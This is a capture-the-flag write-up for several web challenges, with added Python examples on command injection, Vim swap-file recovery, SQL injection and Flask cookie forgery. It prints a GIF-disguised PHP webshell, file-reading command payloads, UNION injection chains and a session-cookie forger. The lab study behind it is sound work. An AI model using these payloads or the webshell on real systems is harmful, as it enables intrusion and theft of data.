Where's my Flag?
It's in the page source: press Ctrl+U to view it.
Follow me and hack me
Ping
The front end filters the input: only an IP address is accepted, so you can't append a system command to it.
Intercept the request in a proxy and edit it there: the appended system command executes, which confirms the guess that the validation only exists in the browser.
Get the flag.
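The server-side check that this ping tool is missing, as an added example (my code, not the challenge's): browser-side validation does nothing against a request edited in a proxy, so the host has to be re-validated on the server and must never be spliced into a shell string. The PHP-style concatenation in vulnerable_command is an assumption about what the backend does; the hardened builder only accepts an IP literal and returns an argv list for subprocess.run with the default shell=False.

```python
"""Added example (not the challenge's code): the check a ping tool needs on the server side.
Validating in the browser does nothing against a request sent straight from a proxy."""
import ipaddress


def vulnerable_command(host: str) -> str:
    """The pattern behind the challenge (assumed): user input concatenated into a shell
    command line, e.g. PHP shell_exec("ping -c 1 " . $_POST['ip']). Run through a shell,
    ';', '|', '&&' or $(...) inside `host` become extra commands."""
    return "ping -c 1 " + host


def build_ping_argv(host: str) -> list:
    """Hardened version. Only a syntactically valid IPv4/IPv6 literal gets through, and the
    result is an argv list for subprocess.run(argv) with shell=False, so the address is a
    single argument that no shell ever parses. Raises ValueError on anything else."""
    addr = ipaddress.ip_address(host.strip())  # rejects "1.1.1.1;id", "1.1.1.1 -c 9999", hostnames, ""
    return ["ping", "-c", "1", str(addr)]


def is_injection_attempt(host: str) -> bool:
    """Server-side classifier for logging/blocking: anything that is not a bare IP literal."""
    try:
        build_ping_argv(host)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for sample in ["127.0.0.1", "::1", "127.0.0.1;cat /flag", "127.0.0.1 | id", "$(cat /flag)"]:
        verdict = "rejected" if is_injection_attempt(sample) else build_ping_argv(sample)
        print(f"{sample!r:24} vulnerable: {vulnerable_command(sample)!r:40} hardened: {verdict}")
```

To actually ping, call subprocess.run(build_ping_argv(host), capture_output=True, timeout=10); passing the argv list (never a joined string with shell=True) is what keeps the argument from being reinterpreted.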
Missile Maze
A front-end mini game; the flag is in the source, you just have to put it into the NSSCTF{...} format.
PHP is the best language in the world!!
Challenge description:
探姬 is convinced that PHP is the best language in the world, so she wrote a little tool in PHP (the flag is in the root directory).
payload:
system('cat /flag');
Homework Management System
Check the page source to get the username and password.
Log in to the admin panel and create a file named shell.php.
Then edit it and write in a GIF header followed by the webshell: GIF89a<?php eval($_POST['jay17']); ?>
Access shell.php and execute commands through the jay17 POST parameter.
Vim yyds
Run a directory scan first.
This challenge is a Vim swap-file leak: while a file is being edited in Vim, a hidden .filename.swp file sits next to it, and if that swap file is left in the web root it serves the unfinished source to anyone who asks for it.
Visit /.index.php.swp and download it. Vim stores the buffer in the swap file with the lines laid out back to front inside each data block, so a raw dump comes out with the lines in reverse order (and the Chinese line mis-decoded); the proper recovery is vim -r .index.php.swp, but reordering by hand works too. Put back in order (I tidied it up myself, it was a mess), the file is:
<html>
<head>
<meta charset="UTF-8">
<style type="text/css">
body,
html {
  display: flex;
  align-items: center;
  justify-content: center;
}
div.vim {
  display: flex;
  align-content: center;
  vertical-align: middle;
  justify-content: center;
}
img {
  border: none;
  width: 8rem;
  height: auto;
}
h1.vim_yyds {
  color: #50f728;
  display: flex;
  align-items: flex-start;
  justify-content: center;
  margin-top: 50;
  margin-left: 5px;
}
h3.vim_said {
  color: #39c2ff;
  display: flex;
  justify-content: center;
  align-items: center;
}
br,
p {
  font-size: 20;
}
</style>
</head>
<body>
<main>
<div class="vim">
<img src="https://www.bing.com/th?id=OSAAS.7B95FA2D97CE022F5E7949F60E350A25&pid=TechQna"></img>
<h1 class="vim_yyds">
Vim yyds
</h1>
</div>
<h3 class="vim_said">
队里师傅说Vim是世界上最好的编辑器，不接受反驳
</h3>
<div class="can_can_vim">
<?php
error_reporting(0);
$password = "Give_Me_Your_Flag";
echo "<p>can can need Vim </p>";
if ($_POST['password'] === base64_encode($password)) {
    echo "<p>Oh You got my password!</p>";
    eval(system($_POST['cmd']));
}
?>
</div>
</main>
</body>
The part that matters is the PHP block: the POSTed password is compared with base64_encode("Give_Me_Your_Flag"), which is R2l2ZV9NZV9Zb3VyX0ZsYWc=, and the cmd parameter goes straight to system() (the eval() around it adds nothing: system() has already run the command by the time eval() sees its return value).
payload:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
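To see why the dump came out reversed, here is an added example (my code, not from the challenge or this writeup) that reads a Vim swap file's block0 header and data blocks and reassembles the lines in their real order. The layout is assumed from Vim's memline.c for a 64-bit Linux build: block0 carries the version string at offset 2, the page size at offset 12 and the edited file's path at offset 108; a data block starts with "ad", has db_txt_start at offset 8, db_txt_end at 12, db_line_count (8 bytes) at 16 and the db_index offsets from 24, and each NUL-terminated line is pushed down from the end of the block, so line 0 sits highest. The fixture builder writes a minimal two-page swap file in that same layout from constructed sample lines, so the whole thing runs offline; the parser walks data blocks in file order, which is the true line order only for small files that fit one block. For anything real, vim -r file.swp is the authoritative recovery.

```python
"""Added example: parse a Vim swap file (layout assumed from memline.c, 64-bit build)."""
import struct

PAGE = 4096
B0_FNAME_OFF, B0_FNAME_LEN = 108, 900   # b0_fname: path of the edited file (assumed offset)
DB_INDEX_MASK = 0x7FFFFFFF              # top bit of a db_index entry is a "marked" flag, not an offset


def parse_swap(data: bytes) -> dict:
    """Recover version, original path and the lines from a Vim swap file."""
    if data[:2] != b"b0":
        raise ValueError("not a Vim swap file: missing 'b0' block0 id")
    version = data[2:12].split(b"\0", 1)[0].decode()
    page_size = struct.unpack_from("<I", data, 12)[0]          # b0_page_size
    fname = data[B0_FNAME_OFF:B0_FNAME_OFF + B0_FNAME_LEN].split(b"\0", 1)[0]
    lines = []
    for off in range(page_size, len(data), page_size):
        blk = data[off:off + page_size]
        if blk[:2] != b"ad":          # 'tp' pointer blocks carry no text
            continue
        # db_txt_start @8, db_txt_end @12, db_line_count @16 (8 bytes), db_index[] @24
        txt_start, txt_end, line_count = struct.unpack_from("<IIq", blk, 8)
        index = struct.unpack_from("<%dI" % line_count, blk, 24)
        end = txt_end                 # line 0 sits at the very top of the block
        for i in range(line_count):
            start = index[i] & DB_INDEX_MASK
            lines.append(blk[start:end].split(b"\0", 1)[0].decode("utf-8", "replace"))
            end = start               # line i+1 lives just below line i
    return {"version": version, "fname": fname.decode("utf-8", "replace"), "lines": lines}


def naive_dump(data: bytes) -> list:
    """What a strings-style extraction sees: printable runs in file order, last line first."""
    runs = data.split(b"\0")
    return [r.decode() for r in runs if len(r) >= 2 and all(32 <= c < 127 for c in r)]


def make_swap_fixture(lines, fname=b"/var/www/html/index.php", page_size=PAGE) -> bytes:
    """Constructed sample: block0 plus one data block, laid out the way Vim stores them
    (each new line is written below the previous one, starting from the end of the block)."""
    b0 = bytearray(page_size)
    b0[0:2] = b"b0"
    b0[2:12] = b"VIM 9.0".ljust(10, b"\0")
    struct.pack_into("<I", b0, 12, page_size)
    b0[B0_FNAME_OFF:B0_FNAME_OFF + len(fname)] = fname
    db = bytearray(page_size)
    db[0:2] = b"ad"
    cursor, index = page_size, []
    for line in lines:
        raw = line.encode() + b"\0"
        cursor -= len(raw)
        db[cursor:cursor + len(raw)] = raw
        index.append(cursor)
    index_end = 24 + 4 * len(lines)
    # db_free, db_txt_start, db_txt_end, db_line_count
    struct.pack_into("<IIIq", db, 4, cursor - index_end, cursor, page_size, len(lines))
    struct.pack_into("<%dI" % len(lines), db, 24, *index)
    return bytes(b0 + db)


SAMPLE_LINES = [   # constructed from the PHP block recovered above
    "<?php",
    "error_reporting(0);",
    '$password = "Give_Me_Your_Flag";',
    "?>",
]

if __name__ == "__main__":
    blob = make_swap_fixture(SAMPLE_LINES)
    print("strings-style order:", naive_dump(blob)[-len(SAMPLE_LINES):])   # reversed, like the raw dump
    info = parse_swap(blob)
    print(info["version"], "was editing", info["fname"])
    print("\n".join(info["lines"]))
```

For a downloaded swap file, parse_swap(open(".index.php.swp", "rb").read()) gives the original path from block0 (useful on its own: it reveals the web root) and the lines of the first data block in order.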
What is this? SQL! Inject it!
Challenge description:
Just wrapped it in a few more layers for safety o(*▽*)q
The challenge shows the query directly, with the parameter wrapped in six parentheses, so close all six and go straight in with a UNION-based injection.
Dump the databases:
1)))))) and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata#
information_schema,mysql,ctftraining,performance_schema,test,ctf
Dump the tables:
1)))))) and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctf"#
users
Dump the columns:
1)))))) and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name="users"#
id,username,password,ip,time,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password
(Without a table_schema filter this matches every table named users: USER, CURRENT_CONNECTIONS and TOTAL_CONNECTIONS come from performance_schema.users and the second id,username,password from ctftraining.users. Add and table_schema="ctf" to the WHERE clause to get only the ctf columns.)
Get the values:
1)))))) and 1=2 union select 1,group_concat(password) from ctf.users#
Easter egg: F1rst_to_Th3_eggggggggg!}
So ctf.users only holds the easter egg, not the flag; the ctftraining database is the other candidate.
Dump the tables again, this time in ctftraining:
1)))))) and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctftraining"#
flag,news,users
Dump the columns again:
1)))))) and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"#
flag
Get the values again:
1)))))) and 1=2 union select 1,group_concat(flag) from ctftraining.flag#
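The two things this chain depends on, as an added example (my code, not the challenge's): finding the number of brackets to close, and the UNION read once they are closed. A throwaway SQLite database stands in for the MySQL backend, so sqlite_master and pragma_table_info play the role of information_schema and "-- " replaces MySQL's "#" comment; the query template copies the challenge's shape (the id wrapped in six parentheses) and the table contents are constructed sample data. mysql_payloads() emits the real MySQL strings for the four steps, with the columns step filtered by schema as well, which is what the column dump above was missing.

```python
"""Added example: paren-depth probe and UNION chain replayed against SQLite (constructed data)."""
import sqlite3

# Same shape as the challenge's query: the id is wrapped in six parentheses.
TEMPLATE = "SELECT id, username FROM users WHERE ((((((id = {})))))) "


def make_db() -> sqlite3.Connection:
    """Constructed sample data (not the challenge's real content)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'F1rst_to_Th3_eggggggggg!}');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('NSSCTF{constructed_sample_flag}');
    """)
    return conn


def vulnerable_query(conn, user_input: str) -> list:
    """The bug: user input is pasted into the SQL text instead of being bound as a parameter."""
    return conn.execute(TEMPLATE.format(user_input)).fetchall()


def find_paren_depth(conn, max_depth: int = 10) -> int:
    """Probe: keep adding ')' until the statement parses again. The first depth whose injected
    tail is accepted is the number of brackets wrapping the parameter (6 here)."""
    for depth in range(max_depth + 1):
        try:
            vulnerable_query(conn, "1" + ")" * depth + " and 1=1-- ")
            return depth
        except sqlite3.OperationalError:   # unbalanced parentheses -> syntax error
            continue
    raise RuntimeError("no depth up to %d balanced the query" % max_depth)


def union_extract(conn, depth: int, expr: str, from_clause: str) -> str:
    """UNION-based read: 'and 1=2' blanks the original row, the union supplies two columns
    (as many as the original SELECT), and the comment swallows the trailing brackets."""
    payload = "1%s and 1=2 union select 1, %s %s-- " % (")" * depth, expr, from_clause)
    return vulnerable_query(conn, payload)[0][1]


def mysql_payloads(depth: int, schema: str, table: str, column: str) -> dict:
    """The same four steps for MySQL (what was actually sent). Filtering columns by
    table_schema as well as table_name avoids the performance_schema.users noise."""
    prefix = "1" + ")" * depth + " and 1=2 union select 1,"
    return {
        "databases": prefix + "group_concat(schema_name) from information_schema.schemata#",
        "tables": prefix + "group_concat(table_name) from information_schema.tables where table_schema='%s'#" % schema,
        "columns": prefix + "group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'#" % (schema, table),
        "values": prefix + "group_concat(%s) from %s.%s#" % (column, schema, table),
    }


if __name__ == "__main__":
    conn = make_db()
    depth = find_paren_depth(conn)
    print("brackets to close:", depth)
    print("tables :", union_extract(conn, depth, "group_concat(name)", "from sqlite_master"))
    print("columns:", union_extract(conn, depth, "group_concat(name)", "from pragma_table_info('flag')"))
    print("flag   :", union_extract(conn, depth, "group_concat(flag)", "from flag"))
    for step, p in mysql_payloads(depth, "ctftraining", "flag", "flag").items():
        print(step, "->", p)
```

The probe is the generally useful part: when the query is not shown, the depth at which "1" + ")"*n + " and 1=1#" stops producing a syntax error is the bracket count, and every later payload just reuses it.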
Http pro max plus
Challenge description: what, another layer…
Forge the X-Forwarded-For header. Nice.
Install a Burp plugin for this (see 通地塔's CSDN post 【测试】—如何用burpsuite伪造IP, "how to forge an IP with Burp Suite").
Delete X-Forwarded-For and the first check passes. (I honestly have no idea what this p-something site is [dog head])
Referer: pornhub.com
User-Agent: Chrome
Via: Clash.win
Visit /wtfwtfwtfwtf.php
View the source, which points to the next page:
/sejishikong.php
1zjs
Run a directory scan first; it turns up the project's build files.
/.gitignore
.idea
.DS_Store
package-lock.json
logs
*.log
npm-debug.log*
yarn-debug.log*
yarn-error.log*
dev
node_modules
coverage
/babel.config.js
module.exports = {
  presets: [
    ['@babel/preset-env', { corejs: '3', useBuiltIns: 'usage' }]
  ],
  plugins: [
    '@babel/plugin-transform-runtime'
  ]
}
/package.json
{
  "name": "creep-cube",
  "private": true,
  "description": "一个使用 Three.js 实现的魔方小游戏",
  "main": "dist/index.cjs.js",
  "module": "dist/index.esm.js",
  "jsdelivr": "dist/index.umd.js",
  "types": "types/index.d.ts",
  "scripts": {
    "dev": "rollup --config rollup.config.dev.js -w",
    "build": "rollup --config rollup.config.build.js"
  },
  "homepage": "https://github.com/buuing/creep-cube",
  "bugs": "https://github.com/buuing/creep-cube/issues",
  "repository": "git+https://github.com/buuing/creep-cube.git",
  "author": "ldq <ldq404@qq.com>",
  "files": ["dist", "types"],
  "keywords": ["Threejs魔方"],
  "devDependencies": {
    "@babel/core": "^7.12.3",
    "@babel/plugin-transform-runtime": "^7.16.4",
    "@babel/preset-env": "^7.12.1",
    "@babel/runtime": "^7.16.3",
    "@rollup/plugin-commonjs": "^16.0.0",
    "@rollup/plugin-eslint": "^8.0.1",
    "@rollup/plugin-json": "^4.1.0",
    "@rollup/plugin-node-resolve": "^10.0.0",
    "@rollup/plugin-typescript": "^6.1.0",
    "@types/animejs": "^3.1.4",
    "@types/three": "^0.137.0",
    "@typescript-eslint/parser": "^4.14.0",
    "babel-plugin-external-helpers": "^6.22.0",
    "babel-preset-latest": "^6.24.1",
    "core-js": "^3.19.2",
    "eslint": "^7.18.0",
    "eslint-plugin-prettier": "^3.3.1",
    "prettier": "^2.2.1",
    "rollup": "^2.33.1",
    "rollup-plugin-babel": "^4.4.0",
    "rollup-plugin-delete": "^2.0.0",
    "rollup-plugin-dts": "^3.0.2",
    "rollup-plugin-livereload": "^2.0.0",
    "rollup-plugin-serve": "^1.1.0",
    "rollup-plugin-terser": "^7.0.2",
    "rollup-plugin-typescript2": "^0.30.0",
    "tslib": "^2.3.1",
    "tweakpane": "^3.0.7",
    "typescript": "^4.0.5"
  },
  "dependencies": {
    "animejs": "^3.2.1",
    "three": "^0.135.0"
  }
}
/tsconfig.json
{
  "compilerOptions": {
    "target": "es5",                       // ES version of the compiled output
    "module": "esnext",                    // front-end module format
    "allowJs": true,                       // allow importing .js files
    "strict": true,                        // strict mode
    "importHelpers": true,
    "moduleResolution": "node",
    "skipLibCheck": true,
    "esModuleInterop": true,
    "allowSyntheticDefaultImports": true,
    "suppressImplicitAnyIndexErrors": true,
    "resolveJsonModule": true,
    "sourceMap": true,
    "declaration": true
  },
  "exclude": ["node_modules/**"],
  "include": ["src/**/*"]
}
Audit the front-end JS (it's long).
Visit /f@k3f1ag.php, then run the JSFuck it contains in the browser console.
Pretend nothing happened
https://github.com/ProbiusOfficial/ProbiusOfficial.github.io/commit/f04fe251bf8811324d4e71cd87b4b15581358490#diff-1474f5fa679c8ac3ff897f022f78e6d753c107596c85a05c06a7466478a3f437
Click to get your Flag!
Note: don't use admin as the name right away, otherwise the page just replies "how could you be admin" and you never get to see the session.
Enter any name, then click the button to get the flag.
The captured request carries a session cookie; at first glance it looks like a JWT.
Well, it isn't.
eyJuYW1lIjoiamF5In0.ZGCa_w.8Lc4BMfby2EluMdcKhltNqwyZxk
Three dot-separated base64url segments, the middle one a timestamp: that is a Flask session cookie, signed with the app's SECRET_KEY but not encrypted, so the first segment decodes to {"name":"jay"} without any key. If the SECRET_KEY can be guessed, the session can be forged, so guess the key.
**Decode:** python flask_session_cookie_manager3.py decode -s "LitCTF" -c "eyJuYW1lIjoiamF5In0.ZGCa_w.8Lc4BMfby2EluMdcKhltNqwyZxk"
**Encode:** python flask_session_cookie_manager3.py encode -s "LitCTF" -t "{'name': 'admin'}"
Send the forged cookie and get the flag.
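What the cookie manager does under the hood, as an added example (my code, not the challenge's or the writeup's tool): parse, verify and forge a Flask session cookie with the standard library only. The format follows Flask's SecureCookieSessionInterface, i.e. itsdangerous' URLSafeTimedSerializer with salt "cookie-session", HMAC-SHA1 over "payload.timestamp" using a key derived as HMAC-SHA1(secret, salt), compact JSON for the payload and a big-endian timestamp. "LitCTF" is the secret the writeup guessed; the cookie constant is the one captured above.

```python
"""Added example: Flask session cookie parse / verify / forge, stdlib only."""
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"   # Flask's fixed salt for session cookies
COOKIE = "eyJuYW1lIjoiamF5In0.ZGCa_w.8Lc4BMfby2EluMdcKhltNqwyZxk"   # captured cookie from the writeup


def b64e(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64d(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def parse_session(cookie: str) -> dict:
    """Payload and timestamp need no key at all: the cookie is signed, not encrypted."""
    payload_b64, ts_b64, sig_b64 = cookie.rsplit(".", 2)   # rsplit: a compressed payload starts with '.'
    compressed = payload_b64.startswith(".")
    raw = b64d(payload_b64[1:] if compressed else payload_b64)
    if compressed:
        raw = zlib.decompress(raw)
    return {
        "payload": json.loads(raw),
        "timestamp": int.from_bytes(b64d(ts_b64), "big"),
        "signature": b64d(sig_b64),
    }


def derive_key(secret: str) -> bytes:
    """itsdangerous key_derivation='hmac': the signing key is HMAC(secret, salt)."""
    return hmac.new(secret.encode(), SALT, hashlib.sha1).digest()


def verify(cookie: str, secret: str):
    """Return the payload if `secret` signs this cookie, else None. Trying candidate
    secrets here is exactly the 'guess the key' step."""
    signed_part, sig_b64 = cookie.rsplit(".", 1)
    expected = hmac.new(derive_key(secret), signed_part.encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(expected, b64d(sig_b64)):
        return None
    return parse_session(cookie)["payload"]


def forge(payload: dict, secret: str, ts=None) -> str:
    """Build a cookie the server accepts when `secret` is its SECRET_KEY."""
    data = json.dumps(payload, separators=(",", ":")).encode()
    body = b64e(data)
    packed = zlib.compress(data)
    if len(packed) < len(data) - 1:     # itsdangerous compresses only when it saves space
        body = "." + b64e(packed)
    ts = int(time.time()) if ts is None else ts
    signed = body + "." + b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    sig = hmac.new(derive_key(secret), signed.encode(), hashlib.sha1).digest()
    return signed + "." + b64e(sig)


if __name__ == "__main__":
    print("captured payload   :", parse_session(COOKIE))
    print("LitCTF signs it?   :", verify(COOKIE, "LitCTF") is not None)
    forged = forge({"name": "admin"}, "LitCTF")
    print("forged admin cookie:", forged)
    print("verifies           :", verify(forged, "LitCTF"))
```

Feeding verify() a wordlist of candidate secrets is the offline way to confirm a weak SECRET_KEY before touching the server; the server itself only checks the signature and, for permanent sessions, the timestamp age, so a forged cookie with a fresh timestamp is indistinguishable from a real one.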
Easter eggs
1/4
2/4
Go and visit it.
3/4
Run a directory scan.
Visit www.zip.
4/4
1)))))) and 1=2 union select 1,group_concat(password) from ctf.users#
Easter egg: F1rst_to_Th3_eggggggggg!}